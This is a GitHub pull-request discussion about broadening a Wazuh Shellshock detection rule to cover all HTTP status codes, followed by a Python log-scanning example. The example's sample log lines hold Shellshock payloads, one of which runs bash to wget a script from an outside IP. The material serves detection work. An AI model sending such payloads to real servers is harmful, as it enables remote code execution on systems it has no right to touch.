Make Shellshock pattern more generic. Detect ShellShock attacks on all HTTP status code responses. #479
Conversation
In 17972c6 I have also updated the expected status code, as a page might also redirect all requests to e.g. a login page or similar. This is covered already by rule 31108, so only the comment had to be updated.
Updated comment accordingly.
6b28982 updated the rules to detect the ShellShock attacks on 50x status codes (e.g. 503 Service Unavailable) as well. A service might be currently unavailable (e.g. maintenance works) and an alert should be thrown in this case.
I'm also wondering if we shouldn't just use Edit: Did this in 7b7e0ca
Hello @iasdeoupxe, Thank you so much for your contribution. Regards,
@Lopuiz Any updates on a review? Three months for such a minor change is quite a long time frame 😢
Hi @iasdeoupxe, Sorry for the late reviews of your contributions. They are really appreciated as always. We always try to attend to the opened issues and pull requests from the users as soon as possible, but, unfortunately, our resources are limited. We are working hard to decrease our response timeframe as well. I hope you understand it, and thank you again. Don't hesitate to ping us if this situation happens again. Best regards,
Is this really necessary? Seeing a shellshock attempt log event says nothing about whether it was successful. I have Wazuh running on public-facing servers, and naturally there are several attempts by bots every day, and the email notifications are now going crazy. In my case, the response codes seem to be 301s (which a commit here added recently). I realize that I can turn this off in my instance, but I am wondering if an exploit attempt should really be worthy of a level 15 alert when there is no indication of success. Else, it's going to create a lot of false positives on production machines.
Hello @k3an3 We are solving it. Best regards,
The text pattern could be anything, e.g.:
or:
This change should catch more of these variants.
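The two points made in this thread (match the Shellshock marker generically rather than as one fixed string, and report it regardless of the HTTP status code the server answered with) can be demonstrated on a few web-server log lines. The following is an added example written for this page, not Wazuh's own rule or decoder logic: it parses Apache/nginx "combined" format access-log lines, checks the attacker-controlled fields (request line, Referer, User-Agent) for the generic marker `()` followed by optional whitespace and `{`, and reports a finding with the status code attached. The sample log lines are constructed for the example; the hosts, paths and payload strings are assumptions, not data from the project.

```python
import re
from typing import Dict, List, Optional

# Generic Shellshock marker: a literal "()" followed by optional whitespace and "{".
# This catches "() { :;};", "() {:;};" and the "() { _; } >_[$($())] { ... }" variant,
# instead of only the single fixed string "() { :;};".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache/nginx "combined" log format. Quoted fields may contain \" escapes, so each one
# is matched as (?:[^"\\]|\\.)* rather than [^"]*.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Constructed sample log (not real traffic): one benign request, three Shellshock
# variants on 404/301/503 answers, and one benign agent that merely contains braces.
SAMPLE_LOG: List[str] = [
    r'203.0.113.10 - - [10/Oct/2014:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    r'198.51.100.7 - - [10/Oct/2014:13:55:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.7/x.sh\""',
    r'198.51.100.7 - - [10/Oct/2014:13:55:41 +0000] "GET /cgi-bin/status HTTP/1.1" 301 0 "() {:;}; /bin/bash -c \"/usr/bin/id\"" "curl/7.37.0"',
    r'198.51.100.7 - - [10/Oct/2014:13:55:42 +0000] "GET /cgi-bin/env.sh HTTP/1.1" 503 0 "-" "() { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id; }"',
    r'203.0.113.11 - - [10/Oct/2014:13:55:43 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "SomeAgent/1.0 (compatible; {})"',
]


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its named fields; None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def classify(line: str) -> Optional[Dict[str, str]]:
    """Return a finding if any attacker-controlled field carries the Shellshock marker.

    The status code is recorded but deliberately not used as a filter: a 301 redirect
    to a login page or a 503 from a box under maintenance still means the payload
    reached the server. It says nothing about whether the attempt succeeded.
    """
    entry = parse_combined(line)
    if entry is None:
        return None
    for field in ("request", "referer", "agent"):
        if SHELLSHOCK_RE.search(entry[field]):
            return {"host": entry["host"], "status": entry["status"], "field": field}
    return None


def detect_shellshock(lines: List[str]) -> List[Dict[str, str]]:
    """Run the check over a batch of log lines and collect the findings in order."""
    findings = []
    for line in lines:
        finding = classify(line)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in detect_shellshock(SAMPLE_LOG):
        print(f"{f['host']} status={f['status']} marker in {f['field']}")
```

Running the block lists the 404, 301 and 503 lines as findings and skips both benign lines, including the one whose User-Agent contains `{}` but no `()` in front of it. Whether such a finding deserves a high-severity alert on its own is the question raised above; the code only shows that the status code is not a reliable reason to drop it.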